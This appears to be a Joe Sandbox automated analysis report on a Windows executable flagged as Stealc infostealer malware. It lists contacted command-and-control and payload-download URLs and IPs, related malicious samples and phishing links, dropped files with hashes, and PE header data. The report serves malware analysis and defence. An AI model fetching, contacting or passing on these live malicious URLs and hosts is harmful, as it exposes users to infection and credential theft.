http://92.255.57.89/697b92cb4e247842/sqlite3.dllv	BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/45c616e921a794b8.phplL	BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://176.113.115.19/ScreenUpdateSync.exe	EbXj93v3bO.exe, EbXj93v3bO.exe, 00000000.00000003.1721342973.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000002.4104042271.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973809946.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000002.4104153786.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973871075.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/697b92cb4e247842/sqlite3.dllll	BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	EbXj93v3bO.exe, 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/track_prt.php?sub=	EbXj93v3bO.exe	false		high
http://92.255.57.89A	BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/45c616e921a794b8.php4	BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/45c616e921a794b8.phpwininit.exe	BB02.tmp.exe, 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exex	EbXj93v3bO.exe, 00000000.00000003.1721342973.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/45c616e921a794b8.php658(v	BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/	EbXj93v3bO.exe, 00000000.00000002.4104095263.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973809946.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://92.255.57.89/697b92cb4e247842/sqlite3.dll	BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89FIECBG	BB02.tmp.exe, 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/	EbXj93v3bO.exe, 00000000.00000003.1721342973.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89:	BB02.tmp.exe, 00000001.00000002.2071351064.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/45c616e921a794b8.phpl	BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/ew	BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
92.255.57.89	unknown	Russian Federation	42253	TELSPRU	true
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572828
Start date and time:	2024-12-11 00:01:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	EbXj93v3bO.exe renamed because original name is a hash value
Original Sample Name:	c3108cefdf629f631dbba54af7124abc.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/7@1/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 52 Number of non-executed functions: 323
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.21, 20.109.210.53, 40.126.53.9, 13.107.246.63
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: EbXj93v3bO.exe

Simulations

Behavior and APIs

Time	Type	Description
18:02:01	API Interceptor	10169722x Sleep call for process: EbXj93v3bO.exe modified
18:02:38	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.179.207	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse
	0r9PL33C8E.exe	Get hash	malicious	Stealc	Browse
	Pw2KHOL9Z8.exe	Get hash	malicious	Stealc	Browse
	o3QbCA4xLs.exe	Get hash	malicious	Stealc, Vidar	Browse
	XhYAqi0wi5.exe	Get hash	malicious	Stealc	Browse
	Uviv7rEtnt.exe	Get hash	malicious	Stealc, Vidar	Browse
	GK059kPZ5B.exe	Get hash	malicious	Stealc	Browse
92.255.57.89	L51yh4SC75.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	84b4eda5d456a2c49d117a0b99bc2ed03044eaa144eb5.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	yZB8qfUJJu.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	5gR5rEGCfw.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.89/45c616e921a794b8.php
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
176.113.115.19	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
post-to-me.com	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse	172.67.179.207
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	0r9PL33C8E.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	Pw2KHOL9Z8.exe	Get hash	malicious	Stealc	Browse	172.67.179.207

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	EFT Remittance_(Deerequipment)CQDM.html	Get hash	malicious	Unknown	Browse	104.21.18.132
	https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://on-chainevm.pages.dev	Get hash	malicious	HTMLPhisher	Browse	104.16.79.73
	https://vcsfi.kidsavancados.com/	Get hash	malicious	Captcha Phish	Browse	104.21.9.144
	file.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	http://prntbl.concejomunicipaldechinu.gov.co	Get hash	malicious	Unknown	Browse	104.26.0.200
	Confirm revised invoice to proceed with payment ASAP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	Josho.spc.elf	Get hash	malicious	Unknown	Browse	172.68.236.61
	https://0388net.cc/000-3399/0utlook098/VdPCnDwL/index.php?login=	Get hash	malicious	HTMLPhisher	Browse	172.67.202.162
TELSPRU	L51yh4SC75.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	84b4eda5d456a2c49d117a0b99bc2ed03044eaa144eb5.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	yZB8qfUJJu.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	5gR5rEGCfw.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.89
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9	Get hash	malicious	Unknown	Browse	92.255.57.144
	https://reviewgustereports.com/	Get hash	malicious	CAPTCHA Scam ClickFix, XWorm	Browse	92.255.57.155
	S1NrYNOYhZ.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.88
SELECTELRU	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	5gR5rEGCfw.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.215
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	45.89.231.211
	5EZLEXDveC.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	176.113.115.163
	teste.sh4.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	45.138.214.123
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	176.124.33.0
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.37
	442.docx.exe	Get hash	malicious	RMSRemoteAdmin	Browse	109.234.156.179

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Confirm revised invoice to proceed with payment ASAP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.179.207
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe	Get hash	malicious	GuLoader	Browse	172.67.179.207
	Bank Swift and SOA PRN0072700314159453_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.179.207
	ST07933.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.179.207
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	172.67.179.207
	FPqVs6et5F.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	c2.hta	Get hash	malicious	XWorm	Browse	172.67.179.207

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BB02.tmp.exe_9d4a573d3a22a33f4c9225399e56b8395f345f_5a9a713c_1ff52202-34fd-420e-944f-407920dd89a7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9644769120393518
Encrypted:	false
SSDEEP:	192:i9zeUhH0d96Haj/XZrP2izuiFAZ24IO89:UzlhUd96HajtFzuiFAY4IO89
MD5:	AB91448584335FA52F25EE9E49265C54
SHA1:	9E561ADB365D2488FC4FC22F16EBCC29E66ACD8C
SHA-256:	822F606D43F0AB133CBF7ED1F9C82CC21834FEF62523DD9A295351927314ACF9
SHA-512:	490A88DB8E776B9144314823EDF1D8AA803CA6DD9106C9A021C429C45380ED014768291CB57842E03EFFD7D6DA1478770C19DC0B623424F0819AF3BBC843AA29
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.4.5.3.5.3.2.6.4.6.2.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.4.5.3.5.3.6.2.4.0.0.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.f.5.2.2.0.2.-.3.4.f.d.-.4.2.0.e.-.9.4.4.f.-.4.0.7.9.2.0.d.d.8.9.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.3.8.f.7.8.4.-.c.6.c.b.-.4.6.3.a.-.a.9.3.1.-.c.b.d.8.9.8.d.d.2.2.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.B.0.2...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.f.8.-.0.0.0.1.-.0.0.1.4.-.9.d.1.0.-.1.1.8.7.5.7.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.f.8.d.f.d.8.2.5.d.0.7.9.5.f.2.9.a.9.6.a.7.8.3.9.f.c.4.8.a.7.0.0.0.0.1.5.0.6.!.0.0.0.0.d.8.f.3.3.7.c.a.3.7.0.a.0.9.9.9.2.a.d.2.7.2.2.0.f.1.4.4.a.6.f.2.0.c.3.7.2.2.5.1.!.B.B.0.2...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER123.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Dec 10 23:02:33 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	62346
Entropy (8bit):	1.8086693899185409
Encrypted:	false
SSDEEP:	192:iYQi5XVbfMy/X8R/OQOJwAqB4Oig+zyzMERCGapesQ0wTI9Si3lTrfO3A63:hQWbfMy0wQEdFOl+zsapyaSqI3Z3
MD5:	98613829FBAC3F9E7ED643871C1C9D9E
SHA1:	D5F947712B96937C33A5085133614C89FEE20B97
SHA-256:	0B041ED34EFF5AA4C37A5034693CB0D3B2B79E03D0B428445BA02568674EE831
SHA-512:	766EB7C1CC8254829A3413C4D3BBE251040398CF5968B88296913AA7E7F47ACBC1579BCFBD9106A07610738154857D964AAD05C08FF10017FDB449EBB7E4A1F4
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........Xg............4...............<.......d....*..........T.......8...........T............3.........................................................................................................eJ......H.......GenuineIntel............T...........k.Xg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER21E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8330
Entropy (8bit):	3.698773468201565
Encrypted:	false
SSDEEP:	192:R6l7wVeJoI6WuI6YKZ6IhgmfNTMpDJ89bv+sfbFm:R6lXJ/6Q6Ys6ugmfNTnv9fU
MD5:	DD06A9AC94DEBEF8340138E4C65CE349
SHA1:	0C3A047452A9BA31D186986D3CF8D61E6D4ED832
SHA-256:	A9211101EE1EC4D9EF7C4B3FF5C55FD8217798937350192A5FDA019679080F6C
SHA-512:	6B6406E611841E601553591ABCCA86AEFCB6E15883EA7F642AEF289CB98F3293625A886AE860855BC62659C86F3948FC12E3ECB4BCEA516E7A1906EAF4B369F4
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER23E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4575
Entropy (8bit):	4.448696121826331
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg77aI9CVWpW8VYcYm8M4JxeFz+q8+NqTB/pzRmd:uIjf6I7Ek7VEJ+fwPzRmd
MD5:	806DAF6B48597202BB4C36919243F42A
SHA1:	333B6B19A6E772CB1AE60D90C26C979335C177E5
SHA-256:	6A34B540F910745DA2D48C3FBB6A7A35694766FD8C516A63D2D03CBE614F8E26
SHA-512:	461A730A173D4598B7F08D092D2577290BC08452D75C095AD3E9C047D1C5A815FCC24DF6C8F3F69A50E8D5D2F9D9BDF3A0CD4B04A7940A043C9CEE3CA6496F62
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625805" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\EbXj93v3bO.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	305152
Entropy (8bit):	6.24186275798831
Encrypted:	false
SSDEEP:	3072:bWDK/GyxdpY69sWL1rI6HajUvMsmnyrZy4ZWcshT1JCHrRzTiqNP9Rg9CEhLkg:6DgG4MWJrw4RI9hhDCLRzdgC
MD5:	3E5FC816D18B06CEFCB86A31AE9FE52E
SHA1:	D8F337CA370A09992AD27220F144A6F20C372251
SHA-256:	1891F566C018182F1B5826B5FE2A05D6927AFF15638D28C7CBE77AB11A366E12
SHA-512:	E14098A1574CEA3610F5256D6F97C53F2D98B660AC6EFDC16E207E4241BEDC95ED209F9D2174142C52657F8FE2CE29797684A54FE2598FCCA6706794D76B092A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.................PE..L...%.}e.....................$?...................@..........................0B......-.......................................'..P.....A.."..............................................................................h............................text............................... ..`.rdata..L ......."..................@..@.data....=..@...l..................@....rsrc...."....A..$..................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Download File

Process:	C:\Users\user\Desktop\EbXj93v3bO.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	305152
Entropy (8bit):	6.24186275798831
Encrypted:	false
SSDEEP:	3072:bWDK/GyxdpY69sWL1rI6HajUvMsmnyrZy4ZWcshT1JCHrRzTiqNP9Rg9CEhLkg:6DgG4MWJrw4RI9hhDCLRzdgC
MD5:	3E5FC816D18B06CEFCB86A31AE9FE52E
SHA1:	D8F337CA370A09992AD27220F144A6F20C372251
SHA-256:	1891F566C018182F1B5826B5FE2A05D6927AFF15638D28C7CBE77AB11A366E12
SHA-512:	E14098A1574CEA3610F5256D6F97C53F2D98B660AC6EFDC16E207E4241BEDC95ED209F9D2174142C52657F8FE2CE29797684A54FE2598FCCA6706794D76B092A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.................PE..L...%.}e.....................$?...................@..........................0B......-.......................................'..P.....A.."..............................................................................h............................text............................... ..`.rdata..L ......."..................@..@.data....=..@...l..................@....rsrc...."....A..$..................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465411847403261
Encrypted:	false
SSDEEP:	6144:5IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSbw:KXD94+WlLZMM6YFH4+w
MD5:	000E0CCDEBC5589A6AB035A90DDE402A
SHA1:	7C7FAA474920E26439FFE888677F1AEF125AC58A
SHA-256:	2059D8437EC662B5D8F4BA08E3FA597B722C87DE1720FE4475C3E146CA76B4FE
SHA-512:	7E8AFE974A00F79374C0C70EC3E0656864EF11DB85AB25DD751504D8CA6B4FB101F06451EAFC7D65299FD8D682182AACE2529AA48A69FB619562C19623EE1D23
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmrR..WK..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.96331650095258
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	EbXj93v3bO.exe
File size:	430'592 bytes
MD5:	c3108cefdf629f631dbba54af7124abc
SHA1:	c9f7a200239da2e89ba8da6afae7fc87cf19537c
SHA256:	91171af67f002002c7845dfc79d87ebdf86badd5c5f91727d00405d5638ab841
SHA512:	5afcfff2041b4db85818097e453e6da7c1fb5e378688beeb50b06287b456fe82eee7020b38d37e03f9ee28383210e6a266f3ce86d07075bcf9467efd704ebb58
SSDEEP:	6144:9tG76pKx44R/AdKguTHgQ5pe0stxs9D1Et7IqCARIICAblFC:54RuuTHgQ5+UZ1WCAmDM
TLSH:	9794DF5175F58136EFB797319B78D6A41A7BBC225BB0918E3698368F1D332D08E72302
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.................PE..L......e...........

File Icon


Icon Hash:	46c7c30b0f4e0d19

Static PE Info

General

Entrypoint:	0x4014f7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65CCB4ED [Wed Feb 14 12:41:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	774cda8fc0346db46e8806dce0e3365d

Entrypoint Preview

Instruction
call 00007FB3F0DE60F0h
jmp 00007FB3F0DE35EDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00454878h], eax
mov dword ptr [00454874h], ecx
mov dword ptr [00454870h], edx
mov dword ptr [0045486Ch], ebx
mov dword ptr [00454868h], esi
mov dword ptr [00454864h], edi
mov word ptr [00454890h], ss
mov word ptr [00454884h], cs
mov word ptr [00454860h], ds
mov word ptr [0045485Ch], es
mov word ptr [00454858h], fs
mov word ptr [00454854h], gs
pushfd
pop dword ptr [00454888h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0045487Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00454880h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0045488Ch], eax
